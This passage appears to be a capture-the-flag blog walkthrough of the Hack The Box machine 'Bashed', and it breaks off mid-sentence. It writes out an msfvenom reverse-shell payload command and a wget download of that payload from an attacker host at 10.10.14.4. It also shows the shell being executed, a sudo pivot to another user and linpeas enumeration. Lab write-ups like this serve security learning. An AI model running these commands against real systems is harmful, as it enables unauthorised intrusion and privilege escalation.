Posts

Showing posts from April, 2022

HTB: Bashed

I run dirbuster with a small wordlist. It finds /dev/phpbash.php, which lets the user www-data run bash commands on the machine. I try various reverse shells and none of them work, so I resort to making an ELF file using msfvenom. The command to make the shell is:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f elf > ex.elf

I switch to the /tmp directory and use wget http://10.10.14.4/ex.elf to download my ELF shell. The system is so old that chmod +x doesn't work. You can use chmod 777 ex.elf instead. I run ./ex.elf and get a reverse shell back in the terminal.

The first command I run is sudo -l, and I notice I can run any command as user scriptmanager. You can either run sudo -u scriptmanager bash -i or connect to another shell.

I download linpeas.sh and run the script. Linpeas is my next step toward privilege escalation. Linpeas points to an unusual directory called /scripts. It also shows /scripts has been modified in the past 5 minutes. This